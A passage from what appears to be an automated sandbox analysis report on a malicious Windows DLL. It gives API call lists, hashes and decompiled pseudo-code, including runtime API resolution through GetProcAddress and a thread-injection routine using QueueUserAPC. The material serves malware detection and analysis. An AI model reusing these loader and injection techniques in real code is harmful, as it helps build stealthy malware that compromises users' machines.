							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}













    0x6d501979
    0x6d501982
    0x6d501986
    0x6d50198c
    0x6d501991
    0x6d501996
    0x6d501999
    0x6d50199c
    0x6d5019a1
    0x6d5019a2
    0x6d5019a5
    0x6d5019b0
    0x6d5019b7
    0x6d5019bb
    0x6d5019bd
    0x6d5019be
    0x6d5019c1
    0x6d5019c6
    0x6d5019d0
    0x6d5019d2
    0x6d5019d2
    0x6d5019ec
    0x6d5019f0
    0x6d501a40
    0x6d5019f2
    0x6d5019fb
    0x6d501a11
    0x6d501a19
    0x6d501a2b
    0x6d501a2f
    0x00000000
    0x00000000
    0x6d501a1b
    0x6d501a1e
    0x6d501a23
    0x6d501a25
    0x6d501a25
    0x6d501a06
    0x6d501a08
    0x6d501a31
    0x6d501a32
    0x6d501a32
    0x6d5019fb
    0x6d501a48

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?,?), ref: 6D501986
    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D50199C
    • _snwprintf.NTDLL ref: 6D5019C1
    • CreateFileMappingW.KERNEL32(000000FF,6D5041C0,00000004,00000000,?,?), ref: 6D5019E6
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D5019FD
    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6D501A11
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D501A29
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A), ref: 6D501A32
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D501A3A
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
    • String ID:
    • API String ID: 1724014008-0
    • Opcode ID: eca2ba0c1dd296400f9d68847556c0f512a64476e0668771430c5ece3bb0ca80
    • Instruction ID: ab079f7893413d372e4f7cff42b988109628a2fe1d8d99388dc526d70c074c89
    • Opcode Fuzzy Hash: eca2ba0c1dd296400f9d68847556c0f512a64476e0668771430c5ece3bb0ca80
    • Instruction Fuzzy Hash: 6C21B0B2500109FFEF15AFA8CC84FAE77BCEB49359F118429FA11D7940D73099418BA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545FA0, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 17fce2d0229bb16b0366a55caf400d992325c04725859126cb095ce1f33e8906
    • Instruction ID: b0148fd6d870f852d17cd6a71daf098ccb32e60f49ea483b7a5fc2cd467fb2ec
    • Opcode Fuzzy Hash: 17fce2d0229bb16b0366a55caf400d992325c04725859126cb095ce1f33e8906
    • Instruction Fuzzy Hash: FBE13B75E0421A9FCB18CFA8C8809EEFBF5EF88314B15856AD915E7740E731AE418B91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545130, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    • _free.LIBCMT ref: 6D54543D
    • _free.LIBCMT ref: 6D545456
    • _free.LIBCMT ref: 6D545494
    • _free.LIBCMT ref: 6D54549D
    • _free.LIBCMT ref: 6D5454A9
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorLast
    • String ID: C
    • API String ID: 3291180501-1037565863
    • Opcode ID: be1bed58258b06fb7847166b4753fb834d20d489f78662fcd06f3d87824dda0a
    • Instruction ID: 221bbbe7e6ddbc3bada16b3dcbc9113a2cecc7408e0312fcb30422995fd90e62
    • Opcode Fuzzy Hash: be1bed58258b06fb7847166b4753fb834d20d489f78662fcd06f3d87824dda0a
    • Instruction Fuzzy Hash: 57C1707590521A9FDB28DF18C884BADB7B4FF49304F1189EAE909A7750D770AE90CF41
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D531907, Relevance: 10.7, APIs: 7, Instructions: 151COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D531995
    • DName::operator+.LIBCMT ref: 6D5319E8
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D5319D9
    • DName::operator+.LIBCMT ref: 6D531A39
    • DName::operator+.LIBCMT ref: 6D531A46
    • DName::operator+.LIBCMT ref: 6D531A8D
    • DName::operator+.LIBCMT ref: 6D531A9A
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$shared_ptr
    • String ID:
    • API String ID: 1037112749-0
    • Opcode ID: 9a087e37e0bfca6890f4cc414914e379350d638e5bf870062fb18dfd7ada2a01
    • Instruction ID: 8cc7a12e431c3729dda3184b6bb2bc2c53b86a3efcb060568d8263b3794ea76b
    • Opcode Fuzzy Hash: 9a087e37e0bfca6890f4cc414914e379350d638e5bf870062fb18dfd7ada2a01
    • Instruction Fuzzy Hash: BF515471904328ABDF0DCFA4D855EEEBBB8EF48714F02445AE605A7580FB709A44CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D532C25, Relevance: 10.6, APIs: 7, Instructions: 102COMMON
    Download Yara Rule
    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D532C4D
    • DName::DName.LIBVCRUNTIME ref: 6D532C7A
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D532C95
    • DName::DName.LIBVCRUNTIME ref: 6D532CB2
    • DName::DName.LIBVCRUNTIME ref: 6D532CE2
    • DName::DName.LIBVCRUNTIME ref: 6D532CEC
    • DName::DName.LIBVCRUNTIME ref: 6D532D13
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::$Name::operator+__aulldvrm
    • String ID:
    • API String ID: 4069495278-0
    • Opcode ID: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction ID: ddad8e9ba5f29ef7ed9f30353ac7c258c373e38ac6fb69f01fdd0d6216ed0fe4
    • Opcode Fuzzy Hash: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction Fuzzy Hash: 4D31E471848628AACF1DCFADC890BED7BB4FF46314F128849E151A7980F7709946CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D546CFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\rundll32.exe$nTm
    • API String ID: 0-2966304076
    • Opcode ID: d16b22704e32908585154936289f42a6f5907071d5888218b490c501db2d55d3
    • Instruction ID: 4dd8a12ea6d2bd152bb2ee82b1c6aa1c2ae69237d60635b04c6d44a03256f2f7
    • Opcode Fuzzy Hash: d16b22704e32908585154936289f42a6f5907071d5888218b490c501db2d55d3
    • Instruction Fuzzy Hash: FF21C27160830ABFA7199EA58C80AEB77ADEF41368701CA24E91897950E730EC5087E2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54DD2B, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D54DA16: _free.LIBCMT ref: 6D54DA3B
    • _free.LIBCMT ref: 6D54DD79
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54DD84
    • _free.LIBCMT ref: 6D54DD8F
    • _free.LIBCMT ref: 6D54DDE3
    • _free.LIBCMT ref: 6D54DDEE
    • _free.LIBCMT ref: 6D54DDF9
    • _free.LIBCMT ref: 6D54DE04
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: f764ab8b687f2b92141a1d159079149925baf696e3bb01017a8169fa8dc5afb0
    • Instruction ID: 16db910f52149eadc1801a1ea706ac2b01935ffaaeaf18ded109503b97d09394
    • Opcode Fuzzy Hash: f764ab8b687f2b92141a1d159079149925baf696e3bb01017a8169fa8dc5afb0
    • Instruction Fuzzy Hash: 26118431549B04A6D724ABB1CC05FDF779D5FC0704F8A8826E39EB7860D734BE044652
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D550AC2, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
    Download Yara Rule
    APIs
    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D550B0A
    • __fassign.LIBCMT ref: 6D550CE9
    • __fassign.LIBCMT ref: 6D550D06
    • WriteFile.KERNEL32(?,6D54A1AC,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550D4E
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D550D8E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550E3A
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 5c9ffcbf8b481c83dd0e44072fcee6dd8ff96caaf8a7244afcba3e61293e6962
    • Instruction ID: 54c17366915b58e660ff94afe6c41bdded4c44db8c9dff32a138fca38f688fa4
    • Opcode Fuzzy Hash: 5c9ffcbf8b481c83dd0e44072fcee6dd8ff96caaf8a7244afcba3e61293e6962
    • Instruction Fuzzy Hash: 03D1CB70D042599FCF1ACFA9C880AEDBBB5BF49318F24406BE815BB641D730AE52CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D537D45, Relevance: 9.2, APIs: 6, Instructions: 221COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D537DD5
    • _free.LIBCMT ref: 6D537DF0
    • _free.LIBCMT ref: 6D537DFB
    • _free.LIBCMT ref: 6D537F08
      • Part of subcall function 6D545D30: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D545D71
    • _free.LIBCMT ref: 6D537EDD
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D537EFE
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$Heap$AllocateErrorFreeLast
    • String ID:
    • API String ID: 4150789928-0
    • Opcode ID: e43d083280e43b433ce692929a99faa4154703f70f5ffae0b4360ba276a52797
    • Instruction ID: d931446e554923726cd1dd4474b34480857c40b6679f911b4449b9adb53167f7
    • Opcode Fuzzy Hash: e43d083280e43b433ce692929a99faa4154703f70f5ffae0b4360ba276a52797
    • Instruction Fuzzy Hash: 93515D76E08222EBDB0D8F7898506BA77A5DF85314F574859EA41DBA40FB319E06C3A0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535D7E, Relevance: 9.2, APIs: 6, Instructions: 180COMMON
    Download Yara Rule
    APIs
    • Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 3211817929-0
    • Opcode ID: ca1ef999371bdb1e7a840992bc85706dc6329adb1af593fcdb9564a47297e67b
    • Instruction ID: 207e8859d230f5c46583432988c0e9f64fcb3a1dd6f5ca4dcf2b2a3037d2bf3d
    • Opcode Fuzzy Hash: ca1ef999371bdb1e7a840992bc85706dc6329adb1af593fcdb9564a47297e67b
    • Instruction Fuzzy Hash: F66191B19042299BDF0DCFA5D440BBEBBB8EF5A304F03545AE601A7A90FB749904CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535C28, Relevance: 9.1, APIs: 6, Instructions: 120COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D535C6C
    • DName::operator+.LIBCMT ref: 6D535C78
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+=.LIBCMT ref: 6D535D38
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D535CF3
      • Part of subcall function 6D5305BD: DName::operator=.LIBVCRUNTIME ref: 6D5305DE
    • DName::DName.LIBVCRUNTIME ref: 6D535D5C
    • DName::operator+.LIBCMT ref: 6D535D68
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
    • String ID:
    • API String ID: 2795783184-0
    • Opcode ID: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction ID: 1f2e6ae3bfcfd5a6626498bfe94e201aedd3ab2de3c378f47c6da629dcc98f77
    • Opcode Fuzzy Hash: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction Fuzzy Hash: 344192B0A043686FDF09CFA8C894BBE7BF5AF46304F525859D2859BA50F7749E40CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5349E6, Relevance: 9.1, APIs: 6, Instructions: 95COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D534A8C
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator+.LIBCMT ref: 6D534A47
    • DName::operator+.LIBCMT ref: 6D534A53
    • DName::DName.LIBVCRUNTIME ref: 6D534AA0
    • DName::operator+.LIBCMT ref: 6D534AAF
    • DName::operator+.LIBCMT ref: 6D534ABB
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 955152517-0
    • Opcode ID: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction ID: 814d33db8aa8146a644f6b06ec32224fabd496cf99d5e9e4908289157b3e4564
    • Opcode Fuzzy Hash: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction Fuzzy Hash: 9331B2719043649FCB0CCF98D490AEEBBF9EF99304F02485EE68697A40F7359A04CB54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501AA5, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D501AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D501C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d5041d0 + 0x6d505014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d5050e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D50136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d5050f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d505104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d505119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d50512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D5018D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












    0x6d501ab3
    0x6d501ab7
    0x6d501b78
    0x6d501abd
    0x6d501ad5
    0x6d501ae4
    0x6d501aeb
    0x6d501aef
    0x6d501af2
    0x6d501b70
    0x6d501b71
    0x6d501af4
    0x6d501b01
    0x6d501b05
    0x6d501b08
    0x00000000
    0x6d501b0a
    0x6d501b17
    0x6d501b1b
    0x6d501b1e
    0x00000000
    0x6d501b20
    0x6d501b2d
    0x6d501b31
    0x6d501b34
    0x00000000
    0x6d501b36
    0x6d501b43
    0x6d501b47
    0x6d501b4a
    0x00000000
    0x6d501b4c
    0x6d501b52
    0x6d501b58
    0x6d501b5d
    0x6d501b64
    0x6d501b67
    0x00000000
    0x6d501b69
    0x6d501b6c
    0x6d501b6c
    0x6d501b67
    0x6d501b4a
    0x6d501b34
    0x6d501b1e
    0x6d501b08
    0x6d501af2
    0x6d501b86

    APIs
      • Part of subcall function 6D501C8F: HeapAlloc.KERNEL32(00000000,?,6D50117D,?,00000000,00000000,?,?,?,6D501810), ref: 6D501C9B
    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D501272,?,?,?,?,00000002,00000000,?,?), ref: 6D501AC9
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501AEB
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B01
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B17
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B2D
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B43
      • Part of subcall function 6D5018D1: memset.NTDLL ref: 6D501950
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProc$AllocHandleHeapModulememset
    • String ID:
    • API String ID: 426539879-0
    • Opcode ID: 837c350207f7749dcbb6fadf70419ca32052ebbdd79332344cb6b32fa10a911d
    • Instruction ID: 06c090254e768ffffda4703e05b9072da51824ba3b85085fdd979d50398ed559
    • Opcode Fuzzy Hash: 837c350207f7749dcbb6fadf70419ca32052ebbdd79332344cb6b32fa10a911d
    • Instruction Fuzzy Hash: 612141B150060A9FDB14EF69C980E6B77FCFF59288B018429F915C7A11E730E911CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501E04, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d504188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d50418c;
						if( *0x6d50418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d504198;
								if( *0x6d504198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d50418c);
						}
						HeapDestroy( *0x6d504190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d504188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0);
						_t41 = _t18;
						 *0x6d504190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d5041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D501CA4(E6D501D32, E6D501EE0(_a12, 1, 0x6d504198, _t41));
							 *0x6d50418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












    0x6d501e07
    0x6d501e13
    0x6d501e15
    0x6d501e18
    0x6d501e8e
    0x6d501e94
    0x6d501e96
    0x6d501e98
    0x6d501e9e
    0x6d501ea0
    0x6d501ea5
    0x6d501ea8
    0x6d501eb3
    0x6d501eb5
    0x00000000
    0x00000000
    0x6d501eb7
    0x6d501eba
    0x6d501ebc
    0x00000000
    0x00000000
    0x00000000
    0x6d501ebc
    0x6d501ec4
    0x6d501ec4
    0x6d501ed0
    0x6d501ed0
    0x6d501e1a
    0x6d501e1b
    0x6d501e3b
    0x6d501e41
    0x6d501e43
    0x6d501e48
    0x6d501e84
    0x6d501e84
    0x6d501e4a
    0x6d501e52
    0x6d501e59
    0x6d501e63
    0x6d501e6f
    0x6d501e76
    0x6d501e7b
    0x6d501e80
    0x00000000
    0x6d501e80
    0x6d501e7b
    0x6d501e48
    0x6d501e1b
    0x6d501edd

    APIs
    • InterlockedIncrement.KERNEL32(6D504188), ref: 6D501E26
    • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6D501E3B
      • Part of subcall function 6D501CA4: CreateThread.KERNEL32(00000000,00000000,00000000,?,6D504198,6D501E74), ref: 6D501CBB
      • Part of subcall function 6D501CA4: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6D501CD0
      • Part of subcall function 6D501CA4: GetLastError.KERNEL32(00000000), ref: 6D501CDB
      • Part of subcall function 6D501CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6D501CE5
      • Part of subcall function 6D501CA4: CloseHandle.KERNEL32(00000000), ref: 6D501CEC
      • Part of subcall function 6D501CA4: SetLastError.KERNEL32(00000000), ref: 6D501CF5
    • InterlockedDecrement.KERNEL32(6D504188), ref: 6D501E8E
    • SleepEx.KERNEL32(00000064,00000001), ref: 6D501EA8
    • CloseHandle.KERNEL32 ref: 6D501EC4
    • HeapDestroy.KERNEL32 ref: 6D501ED0
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
    • String ID:
    • API String ID: 2110400756-0
    • Opcode ID: af81b4b42e9e7cef32f86eb63da37bff5263ff09e3b052b37ea79d7f3cfbc779
    • Instruction ID: e47518073d8cf81db53b54104f1926deca42c706051f8a3e86ea37be545f352f
    • Opcode Fuzzy Hash: af81b4b42e9e7cef32f86eb63da37bff5263ff09e3b052b37ea79d7f3cfbc779
    • Instruction Fuzzy Hash: EF215171A01206EBDF049FA9CC84F6E7FB8FB6A3A9752452DE605D3940E7308D008B61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EB4D, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,6D52E60D,6D52A335,6D52A779), ref: 6D52EB5B
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D52EB69
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D52EB82
    • SetLastError.KERNEL32(00000000,?,6D52E60D,6D52A335,6D52A779), ref: 6D52EBD4
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 118bb4508020c1f83d1e6cdc1314d97f7598335a7bfbdad2e9831edf32118299
    • Instruction ID: 800b50aebc63435a2d98185fd5eb020afc386178abb9eebf843a45a1d35bdb7a
    • Opcode Fuzzy Hash: 118bb4508020c1f83d1e6cdc1314d97f7598335a7bfbdad2e9831edf32118299
    • Instruction Fuzzy Hash: E001F53210C3329EAE0D1675EC84F1A2BAAFB573B9733062DE121D5CD0FF2148149389
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501CA4, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D501CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				long _t11;
				void* _t13;

				_t13 = CreateThread(0, 0, __imp__SleepEx,  *0x6d5041cc, 0, _a12);
				if(_t13 != 0 && QueueUserAPC(_v0, _t13, _a4) == 0) {
					_t11 = GetLastError();
					TerminateThread(_t13, _t11);
					CloseHandle(_t13);
					_t13 = 0;
					SetLastError(_t11);
				}
				return _t13;
			}






    0x6d501cc1
    0x6d501cc5
    0x6d501ce1
    0x6d501ce5
    0x6d501cec
    0x6d501cf3
    0x6d501cf5
    0x6d501cfb
    0x6d501cff

    APIs
    • CreateThread.KERNEL32(00000000,00000000,00000000,?,6D504198,6D501E74), ref: 6D501CBB
    • QueueUserAPC.KERNEL32(?,00000000,?), ref: 6D501CD0
    • GetLastError.KERNEL32(00000000), ref: 6D501CDB
    • TerminateThread.KERNEL32(00000000,00000000), ref: 6D501CE5
    • CloseHandle.KERNEL32(00000000), ref: 6D501CEC
    • SetLastError.KERNEL32(00000000), ref: 6D501CF5
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
    • String ID:
    • API String ID: 3832013932-0
    • Opcode ID: 0ab4a9fee8599366b2e6bd47becd1be40a0568556daaf98b7f1ae1b5ebd1ec7e
    • Instruction ID: e8a26b5971025458e82b0f11c085cb150f8dde0193a0cb37bfc48d88cf124303
    • Opcode Fuzzy Hash: 0ab4a9fee8599366b2e6bd47becd1be40a0568556daaf98b7f1ae1b5ebd1ec7e
